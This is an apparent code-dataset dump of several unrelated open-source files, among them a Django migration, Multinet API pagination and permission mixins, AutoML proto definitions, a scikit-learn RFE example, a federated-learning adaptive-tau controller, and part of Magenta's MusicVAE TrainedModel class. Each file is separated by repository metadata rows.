train_view.treeview.grid(row=0, column=0, sticky=tk.NSEW)
scrollbar.grid(row=0, column=1, sticky=tk.NS)
frame.rowconfigure(0, weight=1)
frame.columnconfigure(0, weight=1)
return train_view
def _layout_widgets(self, content_frame):
content_frame.grid(row=0, column=0, sticky=tk.NSEW)
self.root.rowconfigure(0, weight=1)
self.root.columnconfigure(0, weight=1)
def bind(self, *args, **kwargs):
self.root.bind(*args, *kwargs)
def unbind(self, *args, **kwargs):
self.root.unbind(*args, *kwargs)
def run(self):
self.root.mainloop()
def quit(self, event=None):
self.root.destroy()
| true | true |
1c2c9d8d053412ea306c9a10e0d6652d47090acf | 855 | py | Python | account/migrations/0004_auto_20171002_1918.py | natotthomer/nattr | f3f7b1bc67ff05f346e7f221d7f88b8500bd8e77 | [
"MIT"
] | 1 | 2017-11-10T19:55:12.000Z | 2017-11-10T19:55:12.000Z | account/migrations/0004_auto_20171002_1918.py | natotthomer/nattr | f3f7b1bc67ff05f346e7f221d7f88b8500bd8e77 | [
"MIT"
] | 9 | 2021-03-08T20:46:52.000Z | 2022-03-11T23:26:33.000Z | account/migrations/0004_auto_20171002_1918.py | natotthomer/nattr | f3f7b1bc67ff05f346e7f221d7f88b8500bd8e77 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 19:18
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('account', '0003_auto_20170922_1544'),
]
operations = [
migrations.AlterField(
model_name='userfollow',
name='follower',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='follows', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='userfollow',
name='following',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='followed_by', to=settings.AUTH_USER_MODEL),
),
]
| 30.535714 | 138 | 0.667836 |
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('account', '0003_auto_20170922_1544'),
]
operations = [
migrations.AlterField(
model_name='userfollow',
name='follower',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='follows', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='userfollow',
name='following',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='followed_by', to=settings.AUTH_USER_MODEL),
),
]
| true | true |
1c2c9eed7b32e658c90b6a2885b2e30dd90f1dbc | 2,702 | py | Python | multinet/api/views/common.py | multinet-app/multinet-api | a658d787f0fb9ba415ed85a1e37c29953486287f | [
"Apache-2.0"
] | null | null | null | multinet/api/views/common.py | multinet-app/multinet-api | a658d787f0fb9ba415ed85a1e37c29953486287f | [
"Apache-2.0"
] | 91 | 2021-03-15T19:00:15.000Z | 2022-03-11T00:04:05.000Z | multinet/api/views/common.py | multinet-app/multinet-api | a658d787f0fb9ba415ed85a1e37c29953486287f | [
"Apache-2.0"
] | 1 | 2022-02-05T15:53:04.000Z | 2022-02-05T15:53:04.000Z | from typing import Dict, List
from arango.cursor import Cursor
from django.http.response import Http404
from django.shortcuts import get_object_or_404
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.request import Request
from rest_framework_extensions.mixins import NestedViewSetMixin
from multinet.api.models import Workspace, WorkspaceRole
from multinet.api.utils.arango import ArangoQuery
class MultinetPagination(LimitOffsetPagination):
default_limit = 100
class ArangoPagination(LimitOffsetPagination):
"""Override the LimitOffsetPagination class to allow for use with arango cursors."""
def _set_pre_query_params(self, request):
self.limit = self.get_limit(request)
if self.limit is None:
return None
self.offset = self.get_offset(request)
self.request = request
def _set_post_query_params(self):
if self.count > self.limit and self.template is not None:
self.display_page_controls = True
def paginate_queryset(self, query: ArangoQuery, request: Request) -> List[Dict]:
self._set_pre_query_params(request)
paginated_query = query.paginate(self.limit, self.offset)
cur: Cursor = paginated_query.execute(full_count=True)
self.count = cur.statistics()['fullCount']
self._set_post_query_params()
return list(cur)
class WorkspaceChildMixin(NestedViewSetMixin):
def get_queryset(self):
"""
Get the queryset for workspace child enpoints.
Check that the requeting user has appropriate permissions for the associated workspace.
"""
child_objects = super().get_queryset()
# prevent warning for schema generation incompatibility
if getattr(self, 'swagger_fake_view', False):
return child_objects.none()
parent_query_dict = self.get_parents_query_dict()
workspace = get_object_or_404(
Workspace.objects.select_related('owner'), name=parent_query_dict['workspace__name']
)
# No user or user permission required for public workspaces
if workspace.public:
return child_objects
# Private workspace
request_user = self.request.user
if not request_user.is_authenticated: # anonymous user
raise Http404
workspace_role = WorkspaceRole.objects.filter(
workspace=workspace, user=request_user
).first()
# If the user is at least a reader or the owner, grant access
if workspace_role is not None or workspace.owner == request_user:
return child_objects
# Read access denied
raise Http404
| 33.358025 | 96 | 0.703923 | from typing import Dict, List
from arango.cursor import Cursor
from django.http.response import Http404
from django.shortcuts import get_object_or_404
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.request import Request
from rest_framework_extensions.mixins import NestedViewSetMixin
from multinet.api.models import Workspace, WorkspaceRole
from multinet.api.utils.arango import ArangoQuery
class MultinetPagination(LimitOffsetPagination):
default_limit = 100
class ArangoPagination(LimitOffsetPagination):
def _set_pre_query_params(self, request):
self.limit = self.get_limit(request)
if self.limit is None:
return None
self.offset = self.get_offset(request)
self.request = request
def _set_post_query_params(self):
if self.count > self.limit and self.template is not None:
self.display_page_controls = True
def paginate_queryset(self, query: ArangoQuery, request: Request) -> List[Dict]:
self._set_pre_query_params(request)
paginated_query = query.paginate(self.limit, self.offset)
cur: Cursor = paginated_query.execute(full_count=True)
self.count = cur.statistics()['fullCount']
self._set_post_query_params()
return list(cur)
class WorkspaceChildMixin(NestedViewSetMixin):
def get_queryset(self):
child_objects = super().get_queryset()
if getattr(self, 'swagger_fake_view', False):
return child_objects.none()
parent_query_dict = self.get_parents_query_dict()
workspace = get_object_or_404(
Workspace.objects.select_related('owner'), name=parent_query_dict['workspace__name']
)
if workspace.public:
return child_objects
request_user = self.request.user
if not request_user.is_authenticated:
raise Http404
workspace_role = WorkspaceRole.objects.filter(
workspace=workspace, user=request_user
).first()
if workspace_role is not None or workspace.owner == request_user:
return child_objects
raise Http404
| true | true |
1c2c9f83b71d4721f0a4459f61f84fd422ec0d20 | 4,817 | py | Python | google/cloud/aiplatform/v1/schema/trainingjob/definition_v1/types/automl_image_object_detection.py | nachocano/python-aiplatform | 1c6b998d9145309d79712f494a2b00b50a9a9bf4 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform/v1/schema/trainingjob/definition_v1/types/automl_image_object_detection.py | nachocano/python-aiplatform | 1c6b998d9145309d79712f494a2b00b50a9a9bf4 | [
"Apache-2.0"
] | 1 | 2021-02-12T23:56:38.000Z | 2021-02-12T23:56:38.000Z | google/cloud/aiplatform/v1/schema/trainingjob/definition_v1/types/automl_image_object_detection.py | nachocano/python-aiplatform | 1c6b998d9145309d79712f494a2b00b50a9a9bf4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1.schema.trainingjob.definition",
manifest={
"AutoMlImageObjectDetection",
"AutoMlImageObjectDetectionInputs",
"AutoMlImageObjectDetectionMetadata",
},
)
class AutoMlImageObjectDetection(proto.Message):
r"""A TrainingJob that trains and uploads an AutoML Image Object
Detection Model.
Attributes:
inputs (google.cloud.aiplatform.v1.schema.trainingjob.definition_v1.types.AutoMlImageObjectDetectionInputs):
The input parameters of this TrainingJob.
metadata (google.cloud.aiplatform.v1.schema.trainingjob.definition_v1.types.AutoMlImageObjectDetectionMetadata):
The metadata information
"""
inputs = proto.Field(
proto.MESSAGE, number=1, message="AutoMlImageObjectDetectionInputs",
)
metadata = proto.Field(
proto.MESSAGE, number=2, message="AutoMlImageObjectDetectionMetadata",
)
class AutoMlImageObjectDetectionInputs(proto.Message):
r"""
Attributes:
model_type (google.cloud.aiplatform.v1.schema.trainingjob.definition_v1.types.AutoMlImageObjectDetectionInputs.ModelType):
budget_milli_node_hours (int):
The training budget of creating this model, expressed in
milli node hours i.e. 1,000 value in this field means 1 node
hour. The actual metadata.costMilliNodeHours will be equal
or less than this value. If further model training ceases to
provide any improvements, it will stop without using the
full budget and the metadata.successfulStopReason will be
``model-converged``. Note, node_hour = actual_hour \*
number_of_nodes_involved. For modelType
``cloud``\ (default), the budget must be between 20,000 and
900,000 milli node hours, inclusive. The default value is
216,000 which represents one day in wall time, considering 9
nodes are used. For model types ``mobile-tf-low-latency-1``,
``mobile-tf-versatile-1``, ``mobile-tf-high-accuracy-1`` the
training budget must be between 1,000 and 100,000 milli node
hours, inclusive. The default value is 24,000 which
represents one day in wall time on a single node that is
used.
disable_early_stopping (bool):
Use the entire training budget. This disables
the early stopping feature. When false the early
stopping feature is enabled, which means that
AutoML Image Object Detection might stop
training before the entire training budget has
been used.
"""
class ModelType(proto.Enum):
r""""""
MODEL_TYPE_UNSPECIFIED = 0
CLOUD_HIGH_ACCURACY_1 = 1
CLOUD_LOW_LATENCY_1 = 2
MOBILE_TF_LOW_LATENCY_1 = 3
MOBILE_TF_VERSATILE_1 = 4
MOBILE_TF_HIGH_ACCURACY_1 = 5
model_type = proto.Field(proto.ENUM, number=1, enum=ModelType,)
budget_milli_node_hours = proto.Field(proto.INT64, number=2)
disable_early_stopping = proto.Field(proto.BOOL, number=3)
class AutoMlImageObjectDetectionMetadata(proto.Message):
r"""
Attributes:
cost_milli_node_hours (int):
The actual training cost of creating this
model, expressed in milli node hours, i.e. 1,000
value in this field means 1 node hour.
Guaranteed to not exceed
inputs.budgetMilliNodeHours.
successful_stop_reason (google.cloud.aiplatform.v1.schema.trainingjob.definition_v1.types.AutoMlImageObjectDetectionMetadata.SuccessfulStopReason):
For successful job completions, this is the
reason why the job has finished.
"""
class SuccessfulStopReason(proto.Enum):
r""""""
SUCCESSFUL_STOP_REASON_UNSPECIFIED = 0
BUDGET_REACHED = 1
MODEL_CONVERGED = 2
cost_milli_node_hours = proto.Field(proto.INT64, number=1)
successful_stop_reason = proto.Field(
proto.ENUM, number=2, enum=SuccessfulStopReason,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| 37.341085 | 155 | 0.688188 |
import proto
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1.schema.trainingjob.definition",
manifest={
"AutoMlImageObjectDetection",
"AutoMlImageObjectDetectionInputs",
"AutoMlImageObjectDetectionMetadata",
},
)
class AutoMlImageObjectDetection(proto.Message):
inputs = proto.Field(
proto.MESSAGE, number=1, message="AutoMlImageObjectDetectionInputs",
)
metadata = proto.Field(
proto.MESSAGE, number=2, message="AutoMlImageObjectDetectionMetadata",
)
class AutoMlImageObjectDetectionInputs(proto.Message):
class ModelType(proto.Enum):
MODEL_TYPE_UNSPECIFIED = 0
CLOUD_HIGH_ACCURACY_1 = 1
CLOUD_LOW_LATENCY_1 = 2
MOBILE_TF_LOW_LATENCY_1 = 3
MOBILE_TF_VERSATILE_1 = 4
MOBILE_TF_HIGH_ACCURACY_1 = 5
model_type = proto.Field(proto.ENUM, number=1, enum=ModelType,)
budget_milli_node_hours = proto.Field(proto.INT64, number=2)
disable_early_stopping = proto.Field(proto.BOOL, number=3)
class AutoMlImageObjectDetectionMetadata(proto.Message):
class SuccessfulStopReason(proto.Enum):
SUCCESSFUL_STOP_REASON_UNSPECIFIED = 0
BUDGET_REACHED = 1
MODEL_CONVERGED = 2
cost_milli_node_hours = proto.Field(proto.INT64, number=1)
successful_stop_reason = proto.Field(
proto.ENUM, number=2, enum=SuccessfulStopReason,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| true | true |
1c2ca03875f2f69020ef92da8bca31da599ca215 | 921 | py | Python | examples/feature_selection/plot_rfe_digits.py | emarkou/scikit-learn | d73822f84f2832dcc25f0ff58769f60871a78025 | [
"BSD-3-Clause"
] | 23 | 2020-04-15T14:02:00.000Z | 2022-03-10T23:17:32.000Z | examples/feature_selection/plot_rfe_digits.py | emarkou/scikit-learn | d73822f84f2832dcc25f0ff58769f60871a78025 | [
"BSD-3-Clause"
] | 29 | 2021-03-04T02:56:48.000Z | 2021-04-06T04:06:45.000Z | examples/feature_selection/plot_rfe_digits.py | emarkou/scikit-learn | d73822f84f2832dcc25f0ff58769f60871a78025 | [
"BSD-3-Clause"
] | 18 | 2020-04-15T14:22:33.000Z | 2022-02-16T06:48:34.000Z | """
=============================
Recursive feature elimination
=============================
A recursive feature elimination example showing the relevance of pixels in
a digit classification task.
.. note::
See also :ref:`sphx_glr_auto_examples_feature_selection_plot_rfe_with_cross_validation.py`
"""
print(__doc__)
from sklearn.svm import SVC
from sklearn.datasets import load_digits
from sklearn.feature_selection import RFE
import matplotlib.pyplot as plt
# Load the digits dataset
digits = load_digits()
X = digits.images.reshape((len(digits.images), -1))
y = digits.target
# Create the RFE object and rank each pixel
svc = SVC(kernel="linear", C=1)
rfe = RFE(estimator=svc, n_features_to_select=1, step=1)
rfe.fit(X, y)
ranking = rfe.ranking_.reshape(digits.images[0].shape)
# Plot pixel ranking
plt.matshow(ranking, cmap=plt.cm.Blues)
plt.colorbar()
plt.title("Ranking of pixels with RFE")
plt.show()
| 24.891892 | 94 | 0.724213 | print(__doc__)
from sklearn.svm import SVC
from sklearn.datasets import load_digits
from sklearn.feature_selection import RFE
import matplotlib.pyplot as plt
digits = load_digits()
X = digits.images.reshape((len(digits.images), -1))
y = digits.target
svc = SVC(kernel="linear", C=1)
rfe = RFE(estimator=svc, n_features_to_select=1, step=1)
rfe.fit(X, y)
ranking = rfe.ranking_.reshape(digits.images[0].shape)
plt.matshow(ranking, cmap=plt.cm.Blues)
plt.colorbar()
plt.title("Ranking of pixels with RFE")
plt.show()
| true | true |
1c2ca105ffaace5c78f7b401dd5af0da9c9e6ff1 | 8,162 | py | Python | control_algorithm/adaptive_tau.py | arj119/adaptive-federated-learning | c7e949bfcfd9a166780f5be838141d51016a7673 | [
"MIT"
] | 94 | 2020-04-14T02:42:26.000Z | 2022-03-23T13:54:31.000Z | control_algorithm/adaptive_tau.py | PengchaoHan/adaptive-federated-learning | 6c22d65c3a46a0b293dc5ddd4cd579f6010445f5 | [
"MIT"
] | 2 | 2021-12-10T07:46:44.000Z | 2022-01-19T23:39:30.000Z | control_algorithm/adaptive_tau.py | PengchaoHan/adaptive-federated-learning | 6c22d65c3a46a0b293dc5ddd4cd579f6010445f5 | [
"MIT"
] | 44 | 2020-05-07T16:25:04.000Z | 2022-03-24T10:48:26.000Z | import math
import numpy as np
from numpy import linalg
from util.utils import recv_msg, send_msg, moving_average
from config import tau_max
class ControlAlgAdaptiveTauServer:
def __init__(self, is_adapt_local, dim_w, client_sock_all, n_nodes, control_param_phi,
moving_average_holding_param):
self.is_adapt_local = is_adapt_local
self.dim_w = dim_w
self.client_sock_all = client_sock_all
self.n_nodes = n_nodes
self.control_param_phi = control_param_phi
self.moving_average_holding_param = moving_average_holding_param
self.beta_adapt_mvaverage = None
self.delta_adapt_mvaverage = None
self.rho_adapt_mvaverage = None
def compute_new_tau(self, data_size_local_all, data_size_total, it_each_local, it_each_global, max_time,
step_size, tau, use_min_loss):
beta_adapt = 0
delta_adapt = 0
rho_adapt = 0
global_grad_global_weight = np.zeros(self.dim_w)
local_grad_global_weight_all = []
control_param_computed = False
for n in range(0, self.n_nodes):
msg = recv_msg(self.client_sock_all[n], 'MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER')
# ['MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER', control_param_computed]
control_param_computed_this_client = msg[1] # Boolean parameter specifying whether parameters for
# control algorithm follows this message
control_param_computed = control_param_computed or control_param_computed_this_client
# Receive additional message for control algorithm if it has been computed
if control_param_computed_this_client:
msg = recv_msg(self.client_sock_all[n], 'MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER')
# ['MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER', betaAdapt, rhoAdapt, localGradGlobalWeight]
beta_adapt_local = msg[1]
rho_adapt_local = msg[2]
local_grad_global_weight = msg[3]
local_grad_global_weight_all.append(local_grad_global_weight)
beta_adapt += data_size_local_all[n] * beta_adapt_local
rho_adapt += data_size_local_all[n] * rho_adapt_local
global_grad_global_weight += data_size_local_all[n] * local_grad_global_weight
global_grad_global_weight /= data_size_total
if control_param_computed and (it_each_local is not None) and (it_each_global is not None):
# finalize beta and delta computation when using control algorithm
beta_adapt /= data_size_total
rho_adapt /= data_size_total
for i in range(0, self.n_nodes):
delta_adapt += data_size_local_all[i] * linalg.norm(local_grad_global_weight_all[i]
- global_grad_global_weight)
delta_adapt /= data_size_total
# compute moving averages
self.beta_adapt_mvaverage = moving_average(self.beta_adapt_mvaverage, beta_adapt, self.moving_average_holding_param)
self.delta_adapt_mvaverage = moving_average(self.delta_adapt_mvaverage, delta_adapt, self.moving_average_holding_param)
self.rho_adapt_mvaverage = moving_average(self.rho_adapt_mvaverage, rho_adapt, self.moving_average_holding_param)
print('betaAdapt_mvaverage =', self.beta_adapt_mvaverage)
print('deltaAdapt_mvaverage =', self.delta_adapt_mvaverage)
print('rhoAdapt_mvaverage =', self.rho_adapt_mvaverage)
# Find tau if using control algorithm
if self.is_adapt_local:
# Find new optimal tau
min_tau_new_tmp = 1
min_val = float('inf')
for tau_new_tmp in range(1, tau * 10 + 1):
h_tau_tmp = max(0.0, (self.delta_adapt_mvaverage / self.beta_adapt_mvaverage) * (
np.power(step_size * self.beta_adapt_mvaverage + 1,
tau_new_tmp) - 1) - self.delta_adapt_mvaverage * step_size * tau_new_tmp)
# The below lines are the new expression, with betaAdapt and rhoAdapt, and additional term of ht
if use_min_loss:
tmp_adjusted_T = (max_time - it_each_local - it_each_global) * tau_new_tmp / \
(it_each_local * tau_new_tmp + it_each_global)
else:
tmp_adjusted_T = max_time * tau_new_tmp / (it_each_local * tau_new_tmp + it_each_global)
tmp_gap = (1 + math.sqrt(max(0.0, 1 + 4 * math.pow(tmp_adjusted_T, 2.0)
* self.control_param_phi * self.rho_adapt_mvaverage
* step_size * h_tau_tmp / tau_new_tmp))) / (
2 * tmp_adjusted_T * step_size * self.control_param_phi) + self.rho_adapt_mvaverage * h_tau_tmp
if tmp_gap < min_val:
min_val = tmp_gap
min_tau_new_tmp = tau_new_tmp
tau_new = min_tau_new_tmp
else:
tau_new = tau
else:
tau_new = tau
return min(tau_new, tau_max)
def __getstate__(self):
# To remove socket from pickle
state = self.__dict__.copy()
del state['client_sock_all']
return state
class ControlAlgAdaptiveTauClient:
def __init__(self):
self.w_last_local_last_round = None
self.grad_last_local_last_round = None
self.loss_last_local_last_round = None
def init_new_round(self, w):
self.control_param_computed = False
self.beta_adapt = None
self.rho_adapt = None
self.grad_last_global = None
def update_after_each_local(self, iteration_index, w, grad, total_iterations):
if iteration_index == 0:
self.grad_last_global = grad
return False
def update_after_all_local(self, model, train_image, train_label, train_indices,
w, w_last_global, loss_last_global):
# Only compute beta and rho locally, delta can only be computed globally
if (self.w_last_local_last_round is not None) and (self.grad_last_local_last_round is not None) and \
(self.loss_last_local_last_round is not None):
# compute beta
c = self.grad_last_local_last_round - self.grad_last_global
tmp_norm = linalg.norm(self.w_last_local_last_round - w_last_global)
if tmp_norm > 1e-10:
self.beta_adapt = linalg.norm(c) / tmp_norm
else:
self.beta_adapt = 0
# Compute rho
if tmp_norm > 1e-10:
self.rho_adapt = linalg.norm(self.loss_last_local_last_round - loss_last_global) / tmp_norm
else:
self.rho_adapt = 0
if self.beta_adapt < 1e-5 or np.isnan(self.beta_adapt):
self.beta_adapt = 1e-5
if np.isnan(self.rho_adapt):
self.rho_adapt = 0
print('betaAdapt =', self.beta_adapt)
self.control_param_computed = True
self.grad_last_local_last_round = model.gradient(train_image, train_label, w, train_indices)
try:
self.loss_last_local_last_round = model.loss_from_prev_gradient_computation()
except: # Will get an exception if the model does not support computing loss from previous gradient computation
self.loss_last_local_last_round = model.loss(train_image, train_label, w, train_indices)
self.w_last_local_last_round = w
def send_to_server(self, sock):
msg = ['MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER', self.control_param_computed]
send_msg(sock, msg)
if self.control_param_computed:
msg = ['MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER', self.beta_adapt, self.rho_adapt, self.grad_last_global]
send_msg(sock, msg)
| 43.414894 | 131 | 0.633301 | import math
import numpy as np
from numpy import linalg
from util.utils import recv_msg, send_msg, moving_average
from config import tau_max
class ControlAlgAdaptiveTauServer:
def __init__(self, is_adapt_local, dim_w, client_sock_all, n_nodes, control_param_phi,
moving_average_holding_param):
self.is_adapt_local = is_adapt_local
self.dim_w = dim_w
self.client_sock_all = client_sock_all
self.n_nodes = n_nodes
self.control_param_phi = control_param_phi
self.moving_average_holding_param = moving_average_holding_param
self.beta_adapt_mvaverage = None
self.delta_adapt_mvaverage = None
self.rho_adapt_mvaverage = None
def compute_new_tau(self, data_size_local_all, data_size_total, it_each_local, it_each_global, max_time,
step_size, tau, use_min_loss):
beta_adapt = 0
delta_adapt = 0
rho_adapt = 0
global_grad_global_weight = np.zeros(self.dim_w)
local_grad_global_weight_all = []
control_param_computed = False
for n in range(0, self.n_nodes):
msg = recv_msg(self.client_sock_all[n], 'MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER')
control_param_computed_this_client = msg[1]
control_param_computed = control_param_computed or control_param_computed_this_client
if control_param_computed_this_client:
msg = recv_msg(self.client_sock_all[n], 'MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER')
beta_adapt_local = msg[1]
rho_adapt_local = msg[2]
local_grad_global_weight = msg[3]
local_grad_global_weight_all.append(local_grad_global_weight)
beta_adapt += data_size_local_all[n] * beta_adapt_local
rho_adapt += data_size_local_all[n] * rho_adapt_local
global_grad_global_weight += data_size_local_all[n] * local_grad_global_weight
global_grad_global_weight /= data_size_total
if control_param_computed and (it_each_local is not None) and (it_each_global is not None):
beta_adapt /= data_size_total
rho_adapt /= data_size_total
for i in range(0, self.n_nodes):
delta_adapt += data_size_local_all[i] * linalg.norm(local_grad_global_weight_all[i]
- global_grad_global_weight)
delta_adapt /= data_size_total
self.beta_adapt_mvaverage = moving_average(self.beta_adapt_mvaverage, beta_adapt, self.moving_average_holding_param)
self.delta_adapt_mvaverage = moving_average(self.delta_adapt_mvaverage, delta_adapt, self.moving_average_holding_param)
self.rho_adapt_mvaverage = moving_average(self.rho_adapt_mvaverage, rho_adapt, self.moving_average_holding_param)
print('betaAdapt_mvaverage =', self.beta_adapt_mvaverage)
print('deltaAdapt_mvaverage =', self.delta_adapt_mvaverage)
print('rhoAdapt_mvaverage =', self.rho_adapt_mvaverage)
if self.is_adapt_local:
min_tau_new_tmp = 1
min_val = float('inf')
for tau_new_tmp in range(1, tau * 10 + 1):
h_tau_tmp = max(0.0, (self.delta_adapt_mvaverage / self.beta_adapt_mvaverage) * (
np.power(step_size * self.beta_adapt_mvaverage + 1,
tau_new_tmp) - 1) - self.delta_adapt_mvaverage * step_size * tau_new_tmp)
if use_min_loss:
tmp_adjusted_T = (max_time - it_each_local - it_each_global) * tau_new_tmp / \
(it_each_local * tau_new_tmp + it_each_global)
else:
tmp_adjusted_T = max_time * tau_new_tmp / (it_each_local * tau_new_tmp + it_each_global)
tmp_gap = (1 + math.sqrt(max(0.0, 1 + 4 * math.pow(tmp_adjusted_T, 2.0)
* self.control_param_phi * self.rho_adapt_mvaverage
* step_size * h_tau_tmp / tau_new_tmp))) / (
2 * tmp_adjusted_T * step_size * self.control_param_phi) + self.rho_adapt_mvaverage * h_tau_tmp
if tmp_gap < min_val:
min_val = tmp_gap
min_tau_new_tmp = tau_new_tmp
tau_new = min_tau_new_tmp
else:
tau_new = tau
else:
tau_new = tau
return min(tau_new, tau_max)
def __getstate__(self):
state = self.__dict__.copy()
del state['client_sock_all']
return state
class ControlAlgAdaptiveTauClient:
def __init__(self):
self.w_last_local_last_round = None
self.grad_last_local_last_round = None
self.loss_last_local_last_round = None
def init_new_round(self, w):
self.control_param_computed = False
self.beta_adapt = None
self.rho_adapt = None
self.grad_last_global = None
def update_after_each_local(self, iteration_index, w, grad, total_iterations):
if iteration_index == 0:
self.grad_last_global = grad
return False
def update_after_all_local(self, model, train_image, train_label, train_indices,
w, w_last_global, loss_last_global):
if (self.w_last_local_last_round is not None) and (self.grad_last_local_last_round is not None) and \
(self.loss_last_local_last_round is not None):
c = self.grad_last_local_last_round - self.grad_last_global
tmp_norm = linalg.norm(self.w_last_local_last_round - w_last_global)
if tmp_norm > 1e-10:
self.beta_adapt = linalg.norm(c) / tmp_norm
else:
self.beta_adapt = 0
if tmp_norm > 1e-10:
self.rho_adapt = linalg.norm(self.loss_last_local_last_round - loss_last_global) / tmp_norm
else:
self.rho_adapt = 0
if self.beta_adapt < 1e-5 or np.isnan(self.beta_adapt):
self.beta_adapt = 1e-5
if np.isnan(self.rho_adapt):
self.rho_adapt = 0
print('betaAdapt =', self.beta_adapt)
self.control_param_computed = True
self.grad_last_local_last_round = model.gradient(train_image, train_label, w, train_indices)
try:
self.loss_last_local_last_round = model.loss_from_prev_gradient_computation()
except:
self.loss_last_local_last_round = model.loss(train_image, train_label, w, train_indices)
self.w_last_local_last_round = w
def send_to_server(self, sock):
msg = ['MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER', self.control_param_computed]
send_msg(sock, msg)
if self.control_param_computed:
msg = ['MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER', self.beta_adapt, self.rho_adapt, self.grad_last_global]
send_msg(sock, msg)
| true | true |
1c2ca250665e6de8aba306124ca10a854862961b | 13,468 | py | Python | magenta/models/music_vae/trained_model.py | veskoch/magenta | 74f16be4341925341617699dffdbddadd747acad | [
"Apache-2.0"
] | 5 | 2018-07-11T02:39:40.000Z | 2020-09-07T19:26:46.000Z | magenta/models/music_vae/trained_model.py | veskoch/magenta | 74f16be4341925341617699dffdbddadd747acad | [
"Apache-2.0"
] | 1 | 2022-02-11T19:01:43.000Z | 2022-02-11T19:01:56.000Z | magenta/models/music_vae/trained_model.py | veskoch/magenta | 74f16be4341925341617699dffdbddadd747acad | [
"Apache-2.0"
] | 2 | 2018-07-11T13:36:19.000Z | 2018-09-01T03:42:04.000Z | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A class for sampling, encoding, and decoding from trained MusicVAE models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import re
# internal imports
import numpy as np
import tensorflow as tf
class NoExtractedExamplesException(Exception):
pass
class MultipleExtractedExamplesException(Exception):
pass
class TrainedModel(object):
"""An interface to a trained model for encoding, decoding, and sampling.
Args:
config: The Config to build the model graph with.
batch_size: The batch size to build the model graph with.
checkpoint_dir_or_path: The directory containing checkpoints for the model,
the most recent of which will be loaded, or a direct path to a specific
checkpoint.
var_name_substitutions: Optional list of string pairs containing regex
patterns and substitution values for renaming model variables to match
those in the checkpoint. Useful for backwards compatibility.
session_target: Optional execution engine to connect to. Defaults to
in-process.
sample_kwargs: Additional, non-tensor keyword arguments to pass to sample
call.
"""
def __init__(self, config, batch_size, checkpoint_dir_or_path=None,
var_name_substitutions=None, session_target='', **sample_kwargs):
checkpoint_path = (tf.train.latest_checkpoint(checkpoint_dir_or_path)
if tf.gfile.IsDirectory(checkpoint_dir_or_path) else
checkpoint_dir_or_path)
self._config = copy.deepcopy(config)
self._config.hparams.batch_size = batch_size
with tf.Graph().as_default():
model = self._config.model
model.build(
self._config.hparams,
self._config.data_converter.output_depth,
is_training=False)
# Input placeholders
self._temperature = tf.placeholder(tf.float32, shape=())
self._z_input = (
tf.placeholder(tf.float32,
shape=[batch_size, self._config.hparams.z_size])
if self._config.hparams.z_size else None)
self._c_input = (
tf.placeholder(
tf.float32,
shape=[None, self._config.data_converter.control_depth])
if self._config.data_converter.control_depth > 0 else None)
self._inputs = tf.placeholder(
tf.float32,
shape=[batch_size, None, self._config.data_converter.input_depth])
self._controls = tf.placeholder(
tf.float32,
shape=[batch_size, None, self._config.data_converter.control_depth])
self._inputs_length = tf.placeholder(
tf.int32,
shape=[batch_size] + list(self._config.data_converter.length_shape))
self._max_length = tf.placeholder(tf.int32, shape=())
# Outputs
self._outputs, self._decoder_results = model.sample(
batch_size,
max_length=self._max_length,
z=self._z_input,
c_input=self._c_input,
temperature=self._temperature,
**sample_kwargs)
if self._config.hparams.z_size:
q_z = model.encode(self._inputs, self._inputs_length, self._controls)
self._mu = q_z.loc
self._sigma = q_z.scale.diag
self._z = q_z.sample()
var_map = None
if var_name_substitutions is not None:
var_map = {}
for v in tf.global_variables():
var_name = v.name[:-2] # Strip ':0' suffix.
for pattern, substitution in var_name_substitutions:
var_name = re.sub(pattern, substitution, var_name)
if var_name != v.name[:-2]:
tf.logging.info('Renaming `%s` to `%s`.', v.name[:-2], var_name)
var_map[var_name] = v
# Restore graph
self._sess = tf.Session(target=session_target)
